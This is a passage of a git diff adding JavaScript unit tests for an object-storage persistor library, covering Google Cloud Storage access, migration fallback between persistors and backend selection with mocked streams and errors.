files', async function () { + expect( + await persistor.checkIfObjectExists(location, 'does-not-exist') + ).to.equal(false) + }) + }) + + describe('directorySize', function () { + beforeEach(async function () { + for (const file of Object.values(files)) { + await persistor.sendFile(location, file, '/uploads/info.txt') + } + }) + + it('should sum directory files size', async function () { + expect(await persistor.directorySize(location, 'animals')).to.equal( + 2 * localFiles['/uploads/info.txt'].length + ) + }) + + it('should return 0 on non-existing directories', async function () { + expect( + await persistor.directorySize(location, 'does-not-exist') + ).to.equal(0) + }) + }) + }) + } +}) + +function md5(str) { + return crypto.createHash('md5').update(str).digest('hex') +} + +async function streamToBuffer(stream) { + const chunks = [] + for await (const chunk of stream) { + chunks.push(chunk) + } + return Buffer.concat(chunks) +} diff --git a/libraries/object-persistor/test/unit/GcsPersistorTests.js b/libraries/object-persistor/test/unit/GcsPersistorTests.js new file mode 100644 index 0000000..16a42c7 --- /dev/null +++ b/libraries/object-persistor/test/unit/GcsPersistorTests.js @@ -0,0 +1,726 @@ +const { EventEmitter } = require('node:events') +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const modulePath = '../../src/GcsPersistor.js' +const SandboxedModule = require('sandboxed-module') +const { ObjectId } = require('mongodb') +const asyncPool = require('tiny-async-pool') + +const Errors = require('../../src/Errors') + +describe('GcsPersistorTests', function () { + const filename = '/wombat/potato.tex' + const bucket = 'womBucket' + const key = 'monKey' + const destKey = 'donKey' + const genericError = new Error('guru meditation error') + const filesSize = 33 + const md5 = 'ffffffff00000000ffffffff00000000' + const WriteStream = 'writeStream' + const redirectUrl = 'https://wombat.potato/giraffe' + + let Logger, + Transform, + PassThrough, + Storage, + Fs, + GcsNotFoundError, + ReadStream, + Stream, + StreamPromises, + GcsBucket, + GcsFile, + GcsPersistor, + FileNotFoundError, + Hash, + Settings, + crypto, + files + + beforeEach(function () { + Settings = { + directoryKeyRegex: /^[0-9a-fA-F]{24}\/[0-9a-fA-F]{24}/, + } + + files = [ + { + metadata: { size: '11', md5Hash: '/////wAAAAD/////AAAAAA==' }, + delete: sinon.stub(), + }, + { + metadata: { size: '22', md5Hash: '/////wAAAAD/////AAAAAA==' }, + delete: sinon.stub(), + }, + ] + + class FakeGCSResponse extends EventEmitter { + constructor() { + super() + this.statusCode = 200 + this.err = null + } + + read() { + if (this.err) return this.emit('error', this.err) + this.emit('response', { statusCode: this.statusCode, headers: {} }) + } + } + + ReadStream = new FakeGCSResponse() + PassThrough = class {} + + Transform = class { + once() {} + } + + Stream = { + PassThrough, + Transform, + } + + StreamPromises = { + pipeline: sinon.stub().resolves(), + } + + GcsFile = { + delete: sinon.stub().resolves(), + createReadStream: sinon.stub().returns(ReadStream), + getMetadata: sinon.stub().resolves([files[0].metadata]), + createWriteStream: sinon.stub().returns(WriteStream), + copy: sinon.stub().resolves(), + exists: sinon.stub().resolves([true]), + getSignedUrl: sinon.stub().resolves([redirectUrl]), + } + + GcsBucket = { + file: sinon.stub().returns(GcsFile), + getFiles: sinon.stub().resolves([files]), + } + + Storage = class { + constructor() { + this.interceptors = [] + } + } + Storage.prototype.bucket = 
sinon.stub().returns(GcsBucket) + + GcsNotFoundError = new Error('File not found') + GcsNotFoundError.code = 404 + + Fs = { + createReadStream: sinon.stub().returns(ReadStream), + } + + FileNotFoundError = new Error('File not found') + FileNotFoundError.code = 'ENOENT' + + Hash = { + end: sinon.stub(), + read: sinon.stub().returns(md5), + digest: sinon.stub().returns(md5), + setEncoding: sinon.stub(), + } + crypto = { + createHash: sinon.stub().returns(Hash), + } + + Logger = { + warn: sinon.stub(), + } + + GcsPersistor = new (SandboxedModule.require(modulePath, { + requires: { + '@google-cloud/storage': { Storage }, + '@overleaf/logger': Logger, + 'tiny-async-pool': asyncPool, + './Errors': Errors, + fs: Fs, + stream: Stream, + 'stream/promises': StreamPromises, + crypto, + }, + globals: { console, Buffer }, + }))(Settings) + }) + + describe('getObjectStream', function () { + describe('when called with valid parameters', function () { + let stream + + beforeEach(async function () { + stream = await GcsPersistor.getObjectStream(bucket, key) + }) + + it('returns a PassThrough stream', function () { + expect(stream).to.be.instanceOf(PassThrough) + }) + + it('fetches the right key from the right bucket', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.createReadStream).to.have.been.called + }) + + it('disables automatic decompression', function () { + expect(GcsFile.createReadStream).to.have.been.calledWith({ + decompress: false, + }) + }) + + it('pipes the stream through the meter', function () { + expect(StreamPromises.pipeline).to.have.been.calledWith( + ReadStream, + sinon.match.instanceOf(Transform), + sinon.match.instanceOf(PassThrough) + ) + }) + }) + + describe('when called with a byte range', function () { + let stream + + beforeEach(async function () { + stream = await GcsPersistor.getObjectStream(bucket, key, { + start: 5, + end: 10, + }) + }) + + it('returns a PassThrough stream', function () { + expect(stream).to.be.instanceOf(PassThrough) + }) + + it('passes the byte range on to GCS', function () { + expect(GcsFile.createReadStream).to.have.been.calledWith({ + decompress: false, + start: 5, + end: 10, + }) + }) + }) + + describe("when the file doesn't exist", function () { + let error, stream + + beforeEach(async function () { + ReadStream.statusCode = 404 + try { + stream = await GcsPersistor.getObjectStream(bucket, key) + } catch (e) { + error = e + } + }) + + it('does not return a stream', function () { + expect(stream).not.to.exist + }) + + it('throws a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + + it('wraps the error', function () { + expect(error.cause).to.exist + }) + + it('stores the bucket and key in the error', function () { + expect(error.info).to.include({ bucketName: bucket, key }) + }) + }) + + describe('when Gcs encounters an unknown error', function () { + let error, stream + + beforeEach(async function () { + ReadStream.err = genericError + try { + stream = await GcsPersistor.getObjectStream(bucket, key) + } catch (err) { + error = err + } + }) + + it('does not return a stream', function () { + expect(stream).not.to.exist + }) + + it('throws a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('wraps the error', function () { + expect(error.cause).to.exist + }) + + it('stores the bucket and key in the error', function () { + expect(error.info).to.include({ bucketName: 
bucket, key }) + }) + }) + }) + + describe('getRedirectUrl', function () { + let signedUrl + + describe('with signed URLs', function () { + beforeEach(async function () { + signedUrl = await GcsPersistor.getRedirectUrl(bucket, key) + }) + + it('should request a signed URL', function () { + expect(GcsFile.getSignedUrl).to.have.been.called + }) + + it('should return the url', function () { + expect(signedUrl).to.equal(redirectUrl) + }) + }) + + describe('with unsigned URLs', function () { + beforeEach(async function () { + GcsPersistor.settings.unsignedUrls = true + GcsPersistor.settings.endpoint = { + apiEndpoint: 'http://custom.endpoint', + } + signedUrl = await GcsPersistor.getRedirectUrl(bucket, key) + }) + + it('should return a plain URL', function () { + expect(signedUrl).to.equal( + `http://custom.endpoint/download/storage/v1/b/${bucket}/o/${key}?alt=media` + ) + }) + }) + }) + + describe('getObjectSize', function () { + describe('when called with valid parameters', function () { + let size + + beforeEach(async function () { + size = await GcsPersistor.getObjectSize(bucket, key) + }) + + it('should return the object size', function () { + expect(size).to.equal(11) + }) + + it('should pass the bucket and key to GCS', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.getMetadata).to.have.been.called + }) + }) + + describe('when the object is not found', function () { + let error + + beforeEach(async function () { + GcsFile.getMetadata = sinon.stub().rejects(GcsNotFoundError) + try { + await GcsPersistor.getObjectSize(bucket, key) + } catch (err) { + error = err + } + }) + + it('should return a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(GcsNotFoundError) + }) + }) + + describe('when GCS returns an error', function () { + let error + + beforeEach(async function () { + GcsFile.getMetadata = sinon.stub().rejects(genericError) + try { + await GcsPersistor.getObjectSize(bucket, key) + } catch (err) { + error = err + } + }) + + it('should return a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('sendStream', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return GcsPersistor.sendStream(bucket, key, ReadStream) + }) + + it('should upload the stream', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.createWriteStream).to.have.been.called + }) + + it('should not try to create a resumable upload', function () { + expect(GcsFile.createWriteStream).to.have.been.calledWith({ + resumable: false, + }) + }) + + it('should meter the stream and pass it to GCS', function () { + expect(StreamPromises.pipeline).to.have.been.calledWith( + ReadStream, + sinon.match.instanceOf(Transform), + WriteStream + ) + }) + + it('calculates the md5 hash of the file', function () { + expect(Hash.digest).to.have.been.called + }) + }) + + describe('when a hash is supplied', function () { + beforeEach(async function () { + return GcsPersistor.sendStream(bucket, key, ReadStream, { + sourceMd5: 'aaaaaaaabbbbbbbbaaaaaaaabbbbbbbb', + }) + }) + + it('should not calculate the md5 hash of the file', 
function () { + expect(Hash.digest).not.to.have.been.called + }) + + it('sends the hash in base64', function () { + expect(GcsFile.createWriteStream).to.have.been.calledWith({ + validation: 'md5', + metadata: { + md5Hash: 'qqqqqru7u7uqqqqqu7u7uw==', + }, + resumable: false, + }) + }) + + it('does not fetch the md5 hash of the uploaded file', function () { + expect(GcsFile.getMetadata).not.to.have.been.called + }) + }) + + describe('when metadata is supplied', function () { + const contentType = 'text/csv' + const contentEncoding = 'gzip' + + beforeEach(async function () { + return GcsPersistor.sendStream(bucket, key, ReadStream, { + contentType, + contentEncoding, + }) + }) + + it('should send the metadata to GCS', function () { + expect(GcsFile.createWriteStream).to.have.been.calledWith({ + metadata: { contentType, contentEncoding }, + resumable: false, + }) + }) + }) + + describe('when the upload fails', function () { + let error + beforeEach(async function () { + StreamPromises.pipeline + .withArgs(ReadStream, sinon.match.instanceOf(Transform), WriteStream) + .rejects(genericError) + try { + await GcsPersistor.sendStream(bucket, key, ReadStream) + } catch (err) { + error = err + } + }) + + it('throws a WriteError', function () { + expect(error).to.be.an.instanceOf(Errors.WriteError) + }) + + it('wraps the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('sendFile', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return GcsPersistor.sendFile(bucket, key, filename) + }) + + it('should create a read stream for the file', function () { + expect(Fs.createReadStream).to.have.been.calledWith(filename) + }) + + it('should create a write stream', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.createWriteStream).to.have.been.called + }) + + it('should upload the stream via the meter', function () { + expect(StreamPromises.pipeline).to.have.been.calledWith( + ReadStream, + sinon.match.instanceOf(Transform), + WriteStream + ) + }) + }) + }) + + describe('copyObject', function () { + const destinationFile = 'destFile' + + beforeEach(function () { + GcsBucket.file.withArgs(destKey).returns(destinationFile) + }) + + describe('with valid parameters', function () { + beforeEach(async function () { + return GcsPersistor.copyObject(bucket, key, destKey) + }) + + it('should copy the object', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.copy).to.have.been.calledWith(destinationFile) + }) + }) + + describe('when the file does not exist', function () { + let error + + beforeEach(async function () { + GcsFile.copy = sinon.stub().rejects(GcsNotFoundError) + try { + await GcsPersistor.copyObject(bucket, key, destKey) + } catch (err) { + error = err + } + }) + + it('should throw a NotFoundError', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + }) + }) + + describe('deleteObject', function () { + describe('with valid parameters', function () { + beforeEach(async function () { + return GcsPersistor.deleteObject(bucket, key) + }) + + it('should delete the object', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.delete).to.have.been.called + }) + }) + + describe('when the file does 
not exist', function () { + let error + + beforeEach(async function () { + GcsFile.delete = sinon.stub().rejects(GcsNotFoundError) + try { + await GcsPersistor.deleteObject(bucket, key) + } catch (err) { + error = err + } + }) + + it('should not throw an error', function () { + expect(error).not.to.exist + }) + }) + }) + + describe('deleteDirectory', function () { + const directoryName = `${new ObjectId()}/${new ObjectId()}` + const directoryPrefix = `${directoryName}/` + describe('with valid parameters', function () { + beforeEach(async function () { + GcsBucket.getFiles = sinon.stub() + // set up multiple paginated calls to getFiles + GcsBucket.getFiles + .withArgs({ prefix: directoryPrefix, autoPaginate: false }) + .resolves([['aaa', 'bbb'], 'call-1']) + GcsBucket.getFiles + .withArgs('call-1') + .resolves([['ccc', 'ddd', 'eee'], 'call-2']) + GcsBucket.getFiles.withArgs('call-2').resolves([['fff', 'ggg']]) + return GcsPersistor.deleteDirectory(bucket, directoryName) + }) + + it('should list the objects in the directory', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.getFiles).to.have.been.calledWith({ + prefix: directoryPrefix, + autoPaginate: false, + }) + expect(GcsBucket.getFiles).to.have.been.calledWith('call-1') + expect(GcsBucket.getFiles).to.have.been.calledWith('call-2') + }) + + it('should delete the files', function () { + expect(GcsFile.delete.callCount).to.equal(7) + }) + }) + + describe('when there is an error listing the objects', function () { + let error + + beforeEach(async function () { + GcsBucket.getFiles = sinon.stub().rejects(genericError) + try { + await GcsPersistor.deleteDirectory(bucket, directoryName) + } catch (err) { + error = err + } + }) + + it('should generate a WriteError', function () { + expect(error).to.be.an.instanceOf(Errors.WriteError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('directorySize', function () { + describe('with valid parameters', function () { + let size + + beforeEach(async function () { + size = await GcsPersistor.directorySize(bucket, key) + }) + + it('should list the objects in the directory', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.getFiles).to.have.been.calledWith({ + prefix: `${key}/`, + }) + }) + + it('should return the directory size', function () { + expect(size).to.equal(filesSize) + }) + }) + + describe('when there are no files', function () { + let size + + beforeEach(async function () { + GcsBucket.getFiles.resolves([[]]) + size = await GcsPersistor.directorySize(bucket, key) + }) + + it('should list the objects in the directory', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.getFiles).to.have.been.calledWith({ + prefix: `${key}/`, + }) + }) + + it('should return zero', function () { + expect(size).to.equal(0) + }) + }) + + describe('when there is an error listing the objects', function () { + let error + + beforeEach(async function () { + GcsBucket.getFiles.rejects(genericError) + try { + await GcsPersistor.directorySize(bucket, key) + } catch (err) { + error = err + } + }) + + it('should generate a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) + + describe('checkIfObjectExists', function () { + describe('when the file exists', 
function () { + let exists + + beforeEach(async function () { + exists = await GcsPersistor.checkIfObjectExists(bucket, key) + }) + + it('should ask the file if it exists', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.exists).to.have.been.called + }) + + it('should return that the file exists', function () { + expect(exists).to.equal(true) + }) + }) + + describe('when the file does not exist', function () { + let exists + + beforeEach(async function () { + GcsFile.exists = sinon.stub().resolves([false]) + exists = await GcsPersistor.checkIfObjectExists(bucket, key) + }) + + it('should get the object header', function () { + expect(Storage.prototype.bucket).to.have.been.calledWith(bucket) + expect(GcsBucket.file).to.have.been.calledWith(key) + expect(GcsFile.exists).to.have.been.called + }) + + it('should return that the file does not exist', function () { + expect(exists).to.equal(false) + }) + }) + + describe('when there is an error', function () { + let error + + beforeEach(async function () { + GcsFile.exists = sinon.stub().rejects(genericError) + try { + await GcsPersistor.checkIfObjectExists(bucket, key) + } catch (err) { + error = err + } + }) + + it('should generate a ReadError', function () { + expect(error).to.be.an.instanceOf(Errors.ReadError) + }) + + it('should wrap the error', function () { + expect(error.cause).to.equal(genericError) + }) + }) + }) +}) diff --git a/libraries/object-persistor/test/unit/MigrationPersistorTests.js b/libraries/object-persistor/test/unit/MigrationPersistorTests.js new file mode 100644 index 0000000..a37aa53 --- /dev/null +++ b/libraries/object-persistor/test/unit/MigrationPersistorTests.js @@ -0,0 +1,532 @@ +const sinon = require('sinon') +const chai = require('chai') +const { expect } = chai +const modulePath = '../../src/MigrationPersistor.js' +const SandboxedModule = require('sandboxed-module') + +const Errors = require('../../src/Errors') + +// Not all methods are tested here, but a method with each type of wrapping has +// tests. Specifically, the following wrapping methods are tested here: +// getObjectStream: _wrapFallbackMethod +// sendStream: forward-to-primary +// deleteObject: _wrapMethodOnBothPersistors +// copyObject: copyFileWithFallback + +describe('MigrationPersistorTests', function () { + const bucket = 'womBucket' + const fallbackBucket = 'bucKangaroo' + const key = 'monKey' + const destKey = 'donKey' + const genericError = new Error('guru meditation error') + const notFoundError = new Errors.NotFoundError('not found') + const size = 33 + const md5 = 'ffffffff' + + let Settings, + Logger, + Stream, + StreamPromises, + MigrationPersistor, + fileStream, + newPersistor + + beforeEach(function () { + fileStream = { + name: 'fileStream', + on: sinon.stub().withArgs('end').yields(), + pipe: sinon.stub(), + } + + newPersistor = function (hasFile) { + return { + sendFile: sinon.stub().resolves(), + sendStream: sinon.stub().resolves(), + getObjectStream: hasFile + ? sinon.stub().resolves(fileStream) + : sinon.stub().rejects(notFoundError), + deleteDirectory: sinon.stub().resolves(), + getObjectSize: hasFile + ? sinon.stub().resolves(size) + : sinon.stub().rejects(notFoundError), + deleteObject: sinon.stub().resolves(), + copyObject: hasFile + ? sinon.stub().resolves() + : sinon.stub().rejects(notFoundError), + checkIfObjectExists: sinon.stub().resolves(hasFile), + directorySize: hasFile + ? 
sinon.stub().resolves(size) + : sinon.stub().rejects(notFoundError), + getObjectMd5Hash: hasFile + ? sinon.stub().resolves(md5) + : sinon.stub().rejects(notFoundError), + } + } + + Settings = { + buckets: { + [bucket]: fallbackBucket, + }, + } + + Stream = { + PassThrough: sinon.stub(), + } + + StreamPromises = { + pipeline: sinon.stub().resolves(), + } + + Logger = { + warn: sinon.stub(), + } + + MigrationPersistor = SandboxedModule.require(modulePath, { + requires: { + stream: Stream, + 'stream/promises': StreamPromises, + './Errors': Errors, + '@overleaf/logger': Logger, + }, + globals: { console }, + }) + }) + + describe('getObjectStream', function () { + const options = { wombat: 'potato' } + describe('when the primary persistor has the file', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor, response + beforeEach(async function () { + primaryPersistor = newPersistor(true) + fallbackPersistor = newPersistor(false) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + response = await migrationPersistor.getObjectStream( + bucket, + key, + options + ) + }) + + it('should return the file stream', function () { + expect(response).to.equal(fileStream) + }) + + it('should fetch the file from the primary persistor, with the correct options', function () { + expect(primaryPersistor.getObjectStream).to.have.been.calledWithExactly( + bucket, + key, + options + ) + }) + + it('should not query the fallback persistor', function () { + expect(fallbackPersistor.getObjectStream).not.to.have.been.called + }) + }) + + describe('when the fallback persistor has the file', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor, response + beforeEach(async function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(true) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + response = await migrationPersistor.getObjectStream( + bucket, + key, + options + ) + }) + + it('should return the file stream', function () { + expect(response).to.be.an.instanceOf(Stream.PassThrough) + }) + + it('should fetch the file from the primary persistor with the correct options', function () { + expect(primaryPersistor.getObjectStream).to.have.been.calledWithExactly( + bucket, + key, + options + ) + }) + + it('should fetch the file from the fallback persistor with the fallback bucket with the correct options', function () { + expect( + fallbackPersistor.getObjectStream + ).to.have.been.calledWithExactly(fallbackBucket, key, options) + }) + + it('should create one read stream', function () { + expect(fallbackPersistor.getObjectStream).to.have.been.calledOnce + }) + + it('should not send the file to the primary', function () { + expect(primaryPersistor.sendStream).not.to.have.been.called + }) + }) + + describe('when the file should be copied to the primary', function () { + let primaryPersistor, + fallbackPersistor, + migrationPersistor, + returnedStream + beforeEach(async function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(true) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + Settings.copyOnMiss = true + returnedStream = await migrationPersistor.getObjectStream( + bucket, + key, + options + ) + }) + + it('should create one read stream', function () { + expect(fallbackPersistor.getObjectStream).to.have.been.calledOnce + }) + + it('should get the md5 hash from 
the source', function () { + expect(fallbackPersistor.getObjectMd5Hash).to.have.been.calledWith( + fallbackBucket, + key + ) + }) + + it('should send a stream to the primary', function () { + expect(primaryPersistor.sendStream).to.have.been.calledWithExactly( + bucket, + key, + sinon.match.instanceOf(Stream.PassThrough), + { sourceMd5: md5 } + ) + }) + + it('should send a stream to the client', function () { + expect(returnedStream).to.be.an.instanceOf(Stream.PassThrough) + }) + }) + + describe('when neither persistor has the file', function () { + it('rejects with a NotFoundError', async function () { + const migrationPersistor = new MigrationPersistor( + newPersistor(false), + newPersistor(false), + Settings + ) + await expect( + migrationPersistor.getObjectStream(bucket, key) + ).to.eventually.be.rejected.and.be.an.instanceOf(Errors.NotFoundError) + }) + }) + + describe('when the primary persistor throws an unexpected error', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor, error + beforeEach(async function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(true) + primaryPersistor.getObjectStream = sinon.stub().rejects(genericError) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + try { + await migrationPersistor.getObjectStream(bucket, key, options) + } catch (err) { + error = err + } + }) + + it('rejects with the error', function () { + expect(error).to.equal(genericError) + }) + + it('does not call the fallback', function () { + expect(fallbackPersistor.getObjectStream).not.to.have.been.called + }) + }) + + describe('when the fallback persistor throws an unexpected error', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor, error + beforeEach(async function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(false) + fallbackPersistor.getObjectStream = sinon.stub().rejects(genericError) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + try { + await migrationPersistor.getObjectStream(bucket, key, options) + } catch (err) { + error = err + } + }) + + it('rejects with the error', function () { + expect(error).to.equal(genericError) + }) + + it('should have called the fallback', function () { + expect(fallbackPersistor.getObjectStream).to.have.been.calledWith( + fallbackBucket, + key + ) + }) + }) + }) + + describe('sendStream', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor + beforeEach(function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(false) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + }) + + describe('when it works', function () { + beforeEach(async function () { + return migrationPersistor.sendStream(bucket, key, fileStream) + }) + + it('should send the file to the primary persistor', function () { + expect(primaryPersistor.sendStream).to.have.been.calledWithExactly( + bucket, + key, + fileStream + ) + }) + + it('should not send the file to the fallback persistor', function () { + expect(fallbackPersistor.sendStream).not.to.have.been.called + }) + }) + + describe('when the primary persistor throws an error', function () { + it('returns the error', async function () { + primaryPersistor.sendStream.rejects(notFoundError) + await expect( + migrationPersistor.sendStream(bucket, key, fileStream) + 
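+ /* sendStream is the forward-to-primary case from the file-header comment: + writes go only to the primary persistor, roughly (a sketch) + async sendStream(...args) { return await this.primaryPersistor.sendStream(...args) } + so a rejection propagates to the caller unwrapped, as asserted here. */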
).to.eventually.be.rejected.and.be.an.instanceOf(Errors.NotFoundError) + }) + }) + }) + + describe('deleteObject', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor + beforeEach(function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(false) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + }) + + describe('when it works', function () { + beforeEach(async function () { + return migrationPersistor.deleteObject(bucket, key) + }) + + it('should delete the file from the primary', function () { + expect(primaryPersistor.deleteObject).to.have.been.calledWithExactly( + bucket, + key + ) + }) + + it('should delete the file from the fallback', function () { + expect(fallbackPersistor.deleteObject).to.have.been.calledWithExactly( + fallbackBucket, + key + ) + }) + }) + + describe('when the primary persistor throws an error', function () { + let error + beforeEach(async function () { + primaryPersistor.deleteObject.rejects(genericError) + try { + await migrationPersistor.deleteObject(bucket, key) + } catch (err) { + error = err + } + }) + + it('should return the error', function () { + expect(error).to.equal(genericError) + }) + + it('should delete the file from the primary', function () { + expect(primaryPersistor.deleteObject).to.have.been.calledWithExactly( + bucket, + key + ) + }) + + it('should delete the file from the fallback', function () { + expect(fallbackPersistor.deleteObject).to.have.been.calledWithExactly( + fallbackBucket, + key + ) + }) + }) + + describe('when the fallback persistor throws an error', function () { + let error + beforeEach(async function () { + fallbackPersistor.deleteObject.rejects(genericError) + try { + await migrationPersistor.deleteObject(bucket, key) + } catch (err) { + error = err + } + }) + + it('should return the error', function () { + expect(error).to.equal(genericError) + }) + + it('should delete the file from the primary', function () { + expect(primaryPersistor.deleteObject).to.have.been.calledWithExactly( + bucket, + key + ) + }) + + it('should delete the file from the fallback', function () { + expect(fallbackPersistor.deleteObject).to.have.been.calledWithExactly( + fallbackBucket, + key + ) + }) + }) + }) + + describe('copyObject', function () { + describe('when the file exists on the primary', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor + beforeEach(async function () { + primaryPersistor = newPersistor(true) + fallbackPersistor = newPersistor(false) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + return migrationPersistor.copyObject(bucket, key, destKey) + }) + + it('should call copyObject to copy the file', function () { + expect(primaryPersistor.copyObject).to.have.been.calledWithExactly( + bucket, + key, + destKey + ) + }) + + it('should not try to read from the fallback', function () { + expect(fallbackPersistor.getObjectStream).not.to.have.been.called + }) + }) + + describe('when the file does not exist on the primary', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor + beforeEach(async function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(true) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + return migrationPersistor.copyObject(bucket, key, destKey) + }) + + it('should call copyObject to copy the file', function () { + 
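+ // copyFileWithFallback, per the file-header comment, roughly runs the flow + // that the next few assertions pin down (a sketch, internals assumed): + //   try { await primary.copyObject(bucket, key, destKey) } + //   catch (err) { // NotFoundError only; anything else propagates + //     const md5 = await fallback.getObjectMd5Hash(fallbackBucket, key) + //     const stream = await fallback.getObjectStream(fallbackBucket, key) + //     await primary.sendStream(bucket, destKey, stream, { sourceMd5: md5 }) + //   }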
expect(primaryPersistor.copyObject).to.have.been.calledWithExactly( + bucket, + key, + destKey + ) + }) + + it('should fetch the file from the fallback', function () { + expect( + fallbackPersistor.getObjectStream + ).to.have.been.calledWith(fallbackBucket, key) + }) + + it('should get the md5 hash from the source', function () { + expect(fallbackPersistor.getObjectMd5Hash).to.have.been.calledWith( + fallbackBucket, + key + ) + }) + + it('should send the file to the primary', function () { + expect(primaryPersistor.sendStream).to.have.been.calledWithExactly( + bucket, + destKey, + sinon.match.instanceOf(Stream.PassThrough), + { sourceMd5: md5 } + ) + }) + }) + + describe('when the file does not exist on the fallback', function () { + let primaryPersistor, fallbackPersistor, migrationPersistor, error + beforeEach(async function () { + primaryPersistor = newPersistor(false) + fallbackPersistor = newPersistor(false) + migrationPersistor = new MigrationPersistor( + primaryPersistor, + fallbackPersistor, + Settings + ) + try { + await migrationPersistor.copyObject(bucket, key, destKey) + } catch (err) { + error = err + } + }) + + it('should call copyObject to copy the file', function () { + expect(primaryPersistor.copyObject).to.have.been.calledWithExactly( + bucket, + key, + destKey + ) + }) + + it('should attempt to fetch the file from the fallback', function () { + expect(fallbackPersistor.getObjectStream).to.have.been.calledWith( + fallbackBucket, + key + ) + }) + + it('should return a not-found error', function () { + expect(error).to.be.an.instanceOf(Errors.NotFoundError) + }) + }) + }) +}) diff --git a/libraries/object-persistor/test/unit/PersistorFactoryTests.js b/libraries/object-persistor/test/unit/PersistorFactoryTests.js new file mode 100644 index 0000000..7f71be8 --- /dev/null +++ b/libraries/object-persistor/test/unit/PersistorFactoryTests.js @@ -0,0 +1,102 @@ +const chai = require('chai') +const { expect } = chai +const SandboxedModule = require('sandboxed-module') +const StreamPromises = require('node:stream/promises') + +const MODULE_PATH = '../../src/PersistorFactory.js' + +describe('PersistorFactory', function () { + let PersistorFactory, FSPersistor, S3Persistor, Settings, GcsPersistor + + beforeEach(function () { + FSPersistor = class { + constructor(settings) { + this.settings = settings + } + + wrappedMethod() { + return 'FSPersistor' + } + } + S3Persistor = class { + wrappedMethod() { + return 'S3Persistor' + } + } + GcsPersistor = class { + wrappedMethod() { + return 'GcsPersistor' + } + } + + Settings = {} + const requires = { + './GcsPersistor': GcsPersistor, + './S3Persistor': { S3Persistor }, + './FSPersistor': FSPersistor, + '@overleaf/logger': { + info() {}, + err() {}, + }, + 'stream/promises': StreamPromises, + } + PersistorFactory = SandboxedModule.require(MODULE_PATH, { requires }) + }) + + it('should implement the S3 wrapped method when S3 is configured', function () { + Settings.backend = 's3' + + expect(PersistorFactory(Settings)).to.respondTo('wrappedMethod') + expect(PersistorFactory(Settings).wrappedMethod()).to.equal('S3Persistor') + }) + + it("should implement the S3 wrapped method when 'aws-sdk' is configured", function () { + Settings.backend = 'aws-sdk' + + expect(PersistorFactory(Settings)).to.respondTo('wrappedMethod') + expect(PersistorFactory(Settings).wrappedMethod()).to.equal('S3Persistor') + }) + + it('should implement the FS wrapped method when FS is configured', function () { + Settings.backend = 'fs' + + 
